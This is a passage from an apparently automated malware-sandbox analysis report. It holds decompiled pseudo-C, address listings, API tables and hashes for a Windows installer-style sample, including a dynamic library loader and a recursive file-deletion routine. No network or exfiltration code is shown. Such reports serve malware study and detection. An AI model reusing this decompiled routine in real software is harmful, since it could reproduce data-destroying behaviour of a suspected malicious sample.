                                                            				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
                                                            					L181:
                                                            					return _t382;
                                                            				} else {
                                                            					_t249 =  *_t382 - 1;
                                                            					if(_t249 == 0) {
                                                            						_t215 = _t382 + 8; // 0x8
                                                            						_t386 = _t215;
                                                            						__eflags =  *_t386;
                                                            						if( *_t386 != 0) {
                                                            							_t250 = GetModuleHandleA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 != 0) {
                                                            								L169:
                                                            								_t220 = _t382 + 0x408; // 0x408
                                                            								_t387 = _t220;
                                                            								_t251 = E73C21ECE(_t250, _t387);
                                                            								 *(_t382 + 0x80c) = _t251;
                                                            								__eflags = _t251;
                                                            								if(_t251 == 0) {
                                                            									__eflags =  *_t387 - 0x23;
                                                            									if( *_t387 == 0x23) {
                                                            										_t222 = _t382 + 0x409; // 0x409
                                                            										_t255 = E73C21326();
                                                            										__eflags = _t255;
                                                            										if(_t255 != 0) {
                                                            											__eflags = _t255 & 0xffff0000;
                                                            											if((_t255 & 0xffff0000) == 0) {
                                                            												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								__eflags =  *(_t392 + 0x3c);
                                                            								if( *(_t392 + 0x3c) != 0) {
                                                            									L176:
                                                            									_t252 = lstrlenA(_t387);
                                                            									_t323 = 0x41;
                                                            									_t387[_t252] = _t323;
                                                            									_t253 = E73C21ECE( *(_t382 + 0x808), _t387);
                                                            									__eflags = _t253;
                                                            									if(_t253 == 0) {
                                                            										__eflags =  *(_t382 + 0x80c);
                                                            										L179:
                                                            										if(__eflags != 0) {
                                                            											goto L181;
                                                            										}
                                                            										L180:
                                                            										_t233 = _t382 + 4;
                                                            										 *_t233 =  *(_t382 + 4) | 0xffffffff;
                                                            										__eflags =  *_t233;
                                                            										goto L181;
                                                            									}
                                                            									L177:
                                                            									 *(_t382 + 0x80c) = _t253;
                                                            									goto L181;
                                                            								} else {
                                                            									__eflags =  *(_t382 + 0x80c);
                                                            									if( *(_t382 + 0x80c) != 0) {
                                                            										goto L181;
                                                            									}
                                                            									goto L176;
                                                            								}
                                                            							}
                                                            							_t250 = LoadLibraryA(_t386);
                                                            							 *(_t382 + 0x808) = _t250;
                                                            							__eflags = _t250;
                                                            							if(_t250 == 0) {
                                                            								goto L180;
                                                            							}
                                                            							goto L169;
                                                            						}
                                                            						_t216 = _t382 + 0x408; // 0x408
                                                            						_t259 = E73C21326();
                                                            						 *(_t382 + 0x80c) = _t259;
                                                            						__eflags = _t259;
                                                            						goto L179;
                                                            					}
                                                            					_t260 = _t249 - 1;
                                                            					if(_t260 == 0) {
                                                            						_t214 = _t382 + 0x408; // 0x408
                                                            						_t261 = _t214;
                                                            						__eflags =  *_t261;
                                                            						if( *_t261 == 0) {
                                                            							goto L181;
                                                            						}
                                                            						_push(_t261);
                                                            						_t253 = E73C21326();
                                                            						goto L177;
                                                            					}
                                                            					if(_t260 != 1) {
                                                            						goto L181;
                                                            					}
                                                            					_t202 = _t382 + 8; // 0x8
                                                            					_t317 = _t202;
                                                            					_push(_t202);
                                                            					_t388 = E73C21326();
                                                            					 *(_t382 + 0x808) = _t388;
                                                            					if(_t388 == 0) {
                                                            						goto L180;
                                                            					}
                                                            					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
                                                            					_t264 = E73C212AF(_t317);
                                                            					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
                                                            					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
                                                            					 *((intOrPtr*)(_t382 + 0x848)) = 1;
                                                            					 *((intOrPtr*)(_t382 + 0x838)) = 1;
                                                            					_t211 = _t382 + 0x408; // 0x408
                                                            					_t253 =  *(_t388->i + E73C21326() * 4);
                                                            					goto L177;
                                                            				}
                                                            			}
                                                            0x73c227dc
                                                            0x73c22766
                                                            0x73c22768
                                                            0x73c2276e
                                                            0x73c2276e
                                                            0x73c22771
                                                            0x73c22774
                                                            0x73c2279a
                                                            0x73c2279a
                                                            0x73c2279a
                                                            0x73c2279d
                                                            0x73c227a0
                                                            0x00000000
                                                            0x00000000
                                                            0x73c227a2
                                                            0x73c227a5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c227a9
                                                            0x73c227aa
                                                            0x73c227ae
                                                            0x73c227ae
                                                            0x73c227b2
                                                            0x73c227b4
                                                            0x73c227b6
                                                            0x73c227cc
                                                            0x73c227b8
                                                            0x73c227bd
                                                            0x73c227c0
                                                            0x73c227c0
                                                            0x00000000
                                                            0x73c227b6
                                                            0x73c22776
                                                            0x73c22776
                                                            0x73c22779
                                                            0x73c2277c
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2277e
                                                            0x00000000
                                                            0x73c2277e
                                                            0x73c2276a
                                                            0x73c2276c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2276c
                                                            0x73c223f8
                                                            0x73c223f8
                                                            0x73c223fb
                                                            0x73c224cc
                                                            0x73c224d0
                                                            0x73c224d0
                                                            0x73c224d5
                                                            0x73c224d8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224de
                                                            0x73c224e5
                                                            0x00000000
                                                            0x73c2269f
                                                            0x73c226a3
                                                            0x73c226a5
                                                            0x73c226a9
                                                            0x73c226a9
                                                            0x73c226aa
                                                            0x73c226ad
                                                            0x73c226af
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226b1
                                                            0x73c226b1
                                                            0x73c226b4
                                                            0x73c226c7
                                                            0x73c226c8
                                                            0x73c226d0
                                                            0x00000000
                                                            0x73c226d0
                                                            0x73c226b6
                                                            0x73c226b6
                                                            0x73c226b8
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ba
                                                            0x73c226bc
                                                            0x73c226be
                                                            0x73c226be
                                                            0x73c226be
                                                            0x73c226bf
                                                            0x73c226c2
                                                            0x73c226c4
                                                            0x73c226a9
                                                            0x73c226aa
                                                            0x73c226ad
                                                            0x73c226af
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226af
                                                            0x00000000
                                                            0x73c224b8
                                                            0x73c224bb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2253f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22526
                                                            0x73c2252a
                                                            0x73c2252c
                                                            0x73c22530
                                                            0x73c22531
                                                            0x73c22532
                                                            0x73c22536
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22671
                                                            0x73c22675
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2267c
                                                            0x73c22685
                                                            0x73c22687
                                                            0x73c2268b
                                                            0x73c2268d
                                                            0x73c22693
                                                            0x73c22694
                                                            0x73c22695
                                                            0x73c2269a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22634
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22549
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226f2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22551
                                                            0x73c22553
                                                            0x73c22554
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226e2
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226e6
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ee
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22598
                                                            0x73c22598
                                                            0x73c2259a
                                                            0x73c2259a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22564
                                                            0x73c22566
                                                            0x73c22567
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22577
                                                            0x73c22579
                                                            0x73c2257a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225aa
                                                            0x73c225aa
                                                            0x73c225ac
                                                            0x73c225ac
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22583
                                                            0x73c22583
                                                            0x73c22585
                                                            0x73c22585
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2258c
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226ea
                                                            0x73c226f4
                                                            0x73c226f4
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2263d
                                                            0x73c22642
                                                            0x73c22648
                                                            0x73c2264a
                                                            0x73c2264b
                                                            0x73c2264b
                                                            0x73c2264e
                                                            0x73c22650
                                                            0x73c22652
                                                            0x73c22653
                                                            0x73c22656
                                                            0x73c22656
                                                            0x73c22658
                                                            0x73c22658
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226dd
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22590
                                                            0x73c22594
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2254d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225a1
                                                            0x73c225a1
                                                            0x73c225a3
                                                            0x73c225a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224ec
                                                            0x73c224f4
                                                            0x73c224f6
                                                            0x73c224f8
                                                            0x73c224fb
                                                            0x73c224ff
                                                            0x73c22503
                                                            0x73c2250b
                                                            0x73c22510
                                                            0x73c22517
                                                            0x73c22519
                                                            0x73c2251a
                                                            0x73c2251d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22558
                                                            0x73c2255a
                                                            0x73c2255a
                                                            0x73c2255b
                                                            0x73c2255b
                                                            0x73c2255d
                                                            0x73c2255e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2259d
                                                            0x73c2259d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2256b
                                                            0x73c2256d
                                                            0x73c2256d
                                                            0x73c2256e
                                                            0x73c2256e
                                                            0x73c22570
                                                            0x73c22571
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2257e
                                                            0x73c22580
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225af
                                                            0x73c225af
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22588
                                                            0x73c22588
                                                            0x00000000
                                                            0x00000000
                                                            0x73c2265e
                                                            0x73c22663
                                                            0x73c22668
                                                            0x73c2266c
                                                            0x73c2266c
                                                            0x73c226d2
                                                            0x73c226d2
                                                            0x73c226d3
                                                            0x73c226d3
                                                            0x73c226d5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c226f5
                                                            0x73c226f5
                                                            0x73c226fb
                                                            0x73c226fc
                                                            0x73c22700
                                                            0x73c22702
                                                            0x73c2272c
                                                            0x73c2272e
                                                            0x73c22730
                                                            0x73c22732
                                                            0x73c22732
                                                            0x73c22735
                                                            0x73c22735
                                                            0x73c2273c
                                                            0x73c2273d
                                                            0x00000000
                                                            0x73c2273d
                                                            0x73c22704
                                                            0x73c22707
                                                            0x73c2270e
                                                            0x73c22711
                                                            0x73c22718
                                                            0x73c22719
                                                            0x73c2271f
                                                            0x73c22723
                                                            0x73c22723
                                                            0x00000000
                                                            0x73c22723
                                                            0x73c22713
                                                            0x73c22716
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c225a6
                                                            0x73c225a6
                                                            0x73c225b1
                                                            0x73c225b1
                                                            0x73c225b2
                                                            0x73c225b2
                                                            0x73c225b9
                                                            0x73c225bb
                                                            0x73c225be
                                                            0x73c225c0
                                                            0x73c225c2
                                                            0x73c225c4
                                                            0x73c225cc
                                                            0x73c225d2
                                                            0x73c225d6
                                                            0x73c225d7
                                                            0x73c225de
                                                            0x73c225e2
                                                            0x73c225e4
                                                            0x73c225e7
                                                            0x73c225e9
                                                            0x73c225ea
                                                            0x73c225ed
                                                            0x73c225f4
                                                            0x73c225f6
                                                            0x73c225f8
                                                            0x73c225fd
                                                            0x73c22602
                                                            0x73c22607
                                                            0x73c22607
                                                            0x73c2260a
                                                            0x73c2260a
                                                            0x73c2260e
                                                            0x73c22616
                                                            0x73c22619
                                                            0x73c2261c
                                                            0x73c22623
                                                            0x73c22627
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c224e5
                                                            0x73c22401
                                                            0x73c22401
                                                            0x73c22404
                                                            0x73c224c4
                                                            0x73c224c6
                                                            0x00000000
                                                            0x73c224c6
                                                            0x73c2240a
                                                            0x73c2240d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c22413
                                                            0x73c22416
                                                            0x73c2247b
                                                            0x73c2247b
                                                            0x73c2247e
                                                            0x73c22498
                                                            0x73c2249a
                                                            0x73c2249a
                                                            0x73c2249b
                                                            0x73c2249b
                                                            0x73c224a4
                                                            0x73c224a8
                                                            0x73c224b0
                                                            0x73c224b0
                                                            0x73c224aa
                                                            0x73c224aa
                                                            0x73c224aa
                                                            0x73c224b2
                                                            0x00000000
                                                            0x73c224b2
                                                            0x73c22480
                                                            0x73c22480

                                                            APIs
                                                              • Part of subcall function 73C212C6: GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73C227C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73C2281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73C2286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73C22876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C22887
                                                            • GlobalFree.KERNEL32(?), ref: 73C22901
                                                            • GlobalFree.KERNEL32(?), ref: 73C22907
                                                            • GlobalFree.KERNEL32(?), ref: 73C2290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73C229D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73C229E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73C22A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73C22A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: 23520d5b9faf97f8872734a31e9929bf4ee55f54f0da92addc1b786978e0e2aa
                                                            • Instruction ID: 7a2082491c9ed925c465a8e0e351ce82dae40cec58c86f9adb61afd57c447bcb
                                                            • Opcode Fuzzy Hash: 23520d5b9faf97f8872734a31e9929bf4ee55f54f0da92addc1b786978e0e2aa
                                                            • Instruction Fuzzy Hash: A832E37260870A9FD385CF35C84075ABFF5BF88716F458A2DE49ACA294DB30D945CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 857 405a19-405a3f call 405cd7 860 405a41-405a53 DeleteFileA 857->860 861 405a58-405a5f 857->861 862 405be2-405be6 860->862 863 405a61-405a63 861->863 864 405a72-405a82 call 406257 861->864 865 405b90-405b95 863->865 866 405a69-405a6c 863->866 872 405a91-405a92 call 405c30 864->872 873 405a84-405a8f lstrcatA 864->873 865->862 869 405b97-405b9a 865->869 866->864 866->865 870 405ba4-405bac call 4065ce 869->870 871 405b9c-405ba2 869->871 870->862 880 405bae-405bc2 call 405be9 call 4059d1 870->880 871->862 875 405a97-405a9a 872->875 873->875 878 405aa5-405aab lstrcatA 875->878 879 405a9c-405aa3 875->879 881 405ab0-405ace lstrlenA FindFirstFileA 878->881 879->878 879->881 896 405bc4-405bc7 880->896 897 405bda-405bdd call 405378 880->897 883 405ad4-405aeb call 405c14 881->883 884 405b86-405b8a 881->884 890 405af6-405af9 883->890 891 405aed-405af1 883->891 884->865 886 405b8c 884->886 886->865 894 405afb-405b00 890->894 895 405b0c-405b1a call 406257 890->895 891->890 893 405af3 891->893 893->890 899 405b02-405b04 894->899 900 405b65-405b77 FindNextFileA 894->900 907 405b31-405b3c call 4059d1 895->907 908 405b1c-405b24 895->908 896->871 902 405bc9-405bd8 call 405378 call 406030 896->902 897->862 899->895 903 405b06-405b0a 899->903 900->883 905 405b7d-405b80 FindClose 900->905 902->862 903->895 903->900 905->884 916 405b5d-405b60 call 405378 907->916 917 405b3e-405b41 907->917 908->900 910 405b26-405b2f call 405a19 908->910 910->900 916->900 919 405b43-405b53 call 405378 call 406030 917->919 920 405b55-405b5b 917->920 919->900 920->900
                                                            C-Code - Quality: 98%
                                                            			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
                                                            				signed int _v8;
                                                            				void* _v12;
                                                            				signed int _v16;
                                                            				struct _WIN32_FIND_DATAA _v336;
                                                            				signed int _t40;
                                                            				char* _t53;
                                                            				signed int _t55;
                                                            				signed int _t58;
                                                            				signed int _t64;
                                                            				signed int _t66;
                                                            				void* _t68;
                                                            				signed char _t69;
                                                            				CHAR* _t71;
                                                            				void* _t72;
                                                            				CHAR* _t73;
                                                            				char* _t76;
                                                            
                                                            				_t69 = _a8;
                                                            				_t73 = _a4;
                                                            				_v8 = _t69 & 0x00000004;
                                                            				_t40 = E00405CD7(__eflags, _t73);
                                                            				_v16 = _t40;
                                                            				if((_t69 & 0x00000008) != 0) {
                                                            					_t66 = DeleteFileA(_t73); // executed
                                                            					asm("sbb eax, eax");
                                                            					_t68 =  ~_t66 + 1;
                                                            					 *0x4524a8 =  *0x4524a8 + _t68;
                                                            					return _t68;
                                                            				}
                                                            				_a4 = _t69;
                                                            				_t8 =  &_a4;
                                                            				 *_t8 = _a4 & 0x00000001;
                                                            				__eflags =  *_t8;
                                                            				if( *_t8 == 0) {
                                                            					L5:
                                                            					E00406257(0x444098, _t73);
                                                            					__eflags = _a4;
                                                            					if(_a4 == 0) {
                                                            						E00405C30(_t73);
                                                            					} else {
                                                            						lstrcatA(0x444098, "\*.*");
                                                            					}
                                                            					__eflags =  *_t73;
                                                            					if( *_t73 != 0) {
                                                            						L10:
                                                            						lstrcatA(_t73, 0x40a014);
                                                            						L11:
                                                            						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                            						_t40 = FindFirstFileA(0x444098,  &_v336);
                                                            						__eflags = _t40 - 0xffffffff;
                                                            						_v12 = _t40;
                                                            						if(_t40 == 0xffffffff) {
                                                            							L29:
                                                            							__eflags = _a4;
                                                            							if(_a4 != 0) {
                                                            								_t32 = _t71 - 1;
                                                            								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                            								__eflags =  *_t32;
                                                            							}
                                                            							goto L31;
                                                            						} else {
                                                            							goto L12;
                                                            						}
                                                            						do {
                                                            							L12:
                                                            							_t76 =  &(_v336.cFileName);
                                                            							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
                                                            							__eflags =  *_t53;
                                                            							if( *_t53 != 0) {
                                                            								__eflags = _v336.cAlternateFileName;
                                                            								if(_v336.cAlternateFileName != 0) {
                                                            									_t76 =  &(_v336.cAlternateFileName);
                                                            								}
                                                            							}
                                                            							__eflags =  *_t76 - 0x2e;
                                                            							if( *_t76 != 0x2e) {
                                                            								L19:
                                                            								E00406257(_t71, _t76);
                                                            								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                            								if(__eflags == 0) {
                                                            									_t55 = E004059D1(__eflags, _t73, _v8);
                                                            									__eflags = _t55;
                                                            									if(_t55 != 0) {
                                                            										E00405378(0xfffffff2, _t73);
                                                            									} else {
                                                            										__eflags = _v8 - _t55;
                                                            										if(_v8 == _t55) {
                                                            											 *0x4524a8 =  *0x4524a8 + 1;
                                                            										} else {
                                                            											E00405378(0xfffffff1, _t73);
                                                            											E00406030(_t72, _t73, 0);
                                                            										}
                                                            									}
                                                            								} else {
                                                            									__eflags = (_a8 & 0x00000003) - 3;
                                                            									if(__eflags == 0) {
                                                            										E00405A19(__eflags, _t73, _a8);
                                                            									}
                                                            								}
                                                            								goto L27;
                                                            							}
                                                            							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                            							__eflags = _t64;
                                                            							if(_t64 == 0) {
                                                            								goto L27;
                                                            							}
                                                            							__eflags = _t64 - 0x2e;
                                                            							if(_t64 != 0x2e) {
                                                            								goto L19;
                                                            							}
                                                            							__eflags =  *((char*)(_t76 + 2));
                                                            							if( *((char*)(_t76 + 2)) == 0) {
                                                            								goto L27;
                                                            							}
                                                            							goto L19;
                                                            							L27:
                                                            							_t58 = FindNextFileA(_v12,  &_v336);
                                                            							__eflags = _t58;
                                                            						} while (_t58 != 0);
                                                            						_t40 = FindClose(_v12);
                                                            						goto L29;
                                                            					}
                                                            					__eflags =  *0x444098 - 0x5c;
                                                            					if( *0x444098 != 0x5c) {
                                                            						goto L11;
                                                            					}
                                                            					goto L10;
                                                            				} else {
                                                            					__eflags = _t40;
                                                            					if(_t40 == 0) {
                                                            						L31:
                                                            						__eflags = _a4;
                                                            						if(_a4 == 0) {
                                                            							L39:
                                                            							return _t40;
                                                            						}
                                                            						__eflags = _v16;
                                                            						if(_v16 != 0) {
                                                            							_t40 = E004065CE(_t73);
                                                            							__eflags = _t40;
                                                            							if(_t40 == 0) {
                                                            								goto L39;
                                                            							}
                                                            							E00405BE9(_t73);
                                                            							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
                                                            							__eflags = _t40;
                                                            							if(_t40 != 0) {
                                                            								return E00405378(0xffffffe5, _t73);
                                                            							}
                                                            							__eflags = _v8;
                                                            							if(_v8 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							E00405378(0xfffffff1, _t73);
                                                            							return E00406030(_t72, _t73, 0);
                                                            						}
                                                            						L33:
                                                            						 *0x4524a8 =  *0x4524a8 + 1;
                                                            						return _t40;
                                                            					}
                                                            					__eflags = _t69 & 0x00000002;
                                                            					if((_t69 & 0x00000002) == 0) {
                                                            						goto L31;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            			}




















                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,75572754,00485000,0047B000), ref: 00405A42
                                                            • lstrcatA.KERNEL32(00444098,\*.*,00444098,?,?,75572754,00485000,0047B000), ref: 00405A8A
                                                            • lstrcatA.KERNEL32(?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AAB
                                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AB1
                                                            • FindFirstFileA.KERNEL32(00444098,?,?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AC2
                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                            • FindClose.KERNEL32(00000000), ref: 00405B80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 2035342205-1173974218
                                                            • Opcode ID: e17e1998f97f5d9c0b05528d7d3f480da4ab8f2a36dede4038293de73e58a342
                                                            • Instruction ID: 7373f7c24065ba85377ce78181eb49bf834506ffe63cf7a55ce9c7ac78545b15
                                                            • Opcode Fuzzy Hash: e17e1998f97f5d9c0b05528d7d3f480da4ab8f2a36dede4038293de73e58a342
                                                            • Instruction Fuzzy Hash: 4651DE30904A08AADB22AB618C89BAF7B78DF42314F24417BF441752D2C77CA981DE6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004065CE(CHAR* _a4) {
                                                            				void* _t2;
                                                            
                                                            				_t2 = FindFirstFileA(_a4, 0x4480e0); // executed
                                                            				if(_t2 == 0xffffffff) {
                                                            					return 0;
                                                            				}
                                                            				FindClose(_t2); // executed
                                                            				return 0x4480e0;
                                                            			}





                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                            • FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction ID: fd41d54537010d52f50df7b9b8b9e3478e19d392ae6c51f4a024acc321f66cb9
                                                            • Opcode Fuzzy Hash: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction Fuzzy Hash: 89D01231514520ABD7516B38BD0C85B7A58AF053313228A3AF066F22E4CF34CC22969C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph image for the function starting at 403dda; legend: Executed / Not Executed)
                                                            C-Code - Quality: 84%
                                                            			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                            				struct HWND__* _v28;
                                                            				void* _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t32;
                                                            				signed int _t34;
                                                            				signed int _t36;
                                                            				struct HWND__* _t46;
                                                            				signed int _t65;
                                                            				struct HWND__* _t71;
                                                            				signed int _t84;
                                                            				struct HWND__* _t89;
                                                            				signed int _t97;
                                                            				int _t101;
                                                            				signed int _t115;
                                                            				int _t116;
                                                            				int _t120;
                                                            				signed int _t122;
                                                            				struct HWND__* _t125;
                                                            				struct HWND__* _t126;
                                                            				int _t127;
                                                            				intOrPtr _t128;
                                                            				long _t131;
                                                            				int _t133;
                                                            				int _t134;
                                                            				void* _t135;
                                                            
                                                            				_t128 = _a8;
                                                            				if(_t128 == 0x110 || _t128 == 0x408) {
                                                            					_t32 = _a12;
                                                            					_t125 = _a4;
                                                            					__eflags = _t128 - 0x110;
                                                            					 *0x43c078 = _t32;
                                                            					if(_t128 == 0x110) {
                                                            						 *0x452428 = _t125;
                                                            						 *0x43c08c = GetDlgItem(_t125, 1);
                                                            						_t89 = GetDlgItem(_t125, 2);
                                                            						_push(0xffffffff);
                                                            						_push(0x1c);
                                                            						 *0x434058 = _t89;
                                                            						E004042D4(_t125);
                                                            						SetClassLongA(_t125, 0xfffffff2,  *0x44e408);
                                                            						 *0x44e3ec = E0040140B(4);
                                                            						_t32 = 1;
                                                            						__eflags = 1;
                                                            						 *0x43c078 = 1;
                                                            					}
                                                            					_t122 =  *0x40a1dc; // 0x0
                                                            					_t134 = 0;
                                                            					_t131 = (_t122 << 6) +  *0x452440;
                                                            					__eflags = _t122;
                                                            					if(_t122 < 0) {
                                                            						L36:
                                                            						E00404320(0x40b);
                                                            						while(1) {
                                                            							_t34 =  *0x43c078;
                                                            							 *0x40a1dc =  *0x40a1dc + _t34;
                                                            							_t131 = _t131 + (_t34 << 6);
                                                            							_t36 =  *0x40a1dc; // 0x0
                                                            							__eflags = _t36 -  *0x452444;
                                                            							if(_t36 ==  *0x452444) {
                                                            								E0040140B(1);
                                                            							}
                                                            							__eflags =  *0x44e3ec - _t134;
                                                            							if( *0x44e3ec != _t134) {
                                                            								break;
                                                            							}
                                                            							__eflags =  *0x40a1dc -  *0x452444; // 0x0
                                                            							if(__eflags >= 0) {
                                                            								break;
                                                            							}
                                                            							_t115 =  *(_t131 + 0x14);
                                                            							E004062EA(_t115, _t125, _t131, 0x48f000,  *((intOrPtr*)(_t131 + 0x24)));
                                                            							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                            							_push(0xfffffc19);
                                                            							E004042D4(_t125);
                                                            							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                            							_push(0xfffffc1b);
                                                            							E004042D4(_t125);
                                                            							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                            							_push(0xfffffc1a);
                                                            							E004042D4(_t125);
                                                            							_t46 = GetDlgItem(_t125, 3);
                                                            							__eflags =  *0x4524ac - _t134;
                                                            							_v28 = _t46;
                                                            							if( *0x4524ac != _t134) {
                                                            								_t115 = _t115 & 0x0000fefd | 0x00000004;
                                                            								__eflags = _t115;
                                                            							}
                                                            							ShowWindow(_t46, _t115 & 0x00000008); // executed
                                                            							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
                                                            							E004042F6(_t115 & 0x00000002);
                                                            							_t116 = _t115 & 0x00000004;
                                                            							EnableWindow( *0x434058, _t116);
                                                            							__eflags = _t116 - _t134;
                                                            							if(_t116 == _t134) {
                                                            								_push(1);
                                                            							} else {
                                                            								_push(_t134);
                                                            							}
                                                            							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
                                                            							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
                                                            							__eflags =  *0x4524ac - _t134;
                                                            							if( *0x4524ac == _t134) {
                                                            								_push( *0x43c08c);
                                                            							} else {
                                                            								SendMessageA(_t125, 0x401, 2, _t134);
                                                            								_push( *0x434058);
                                                            							}
                                                            							E00404309();
                                                            							E00406257(0x43c090, E00403DBB());
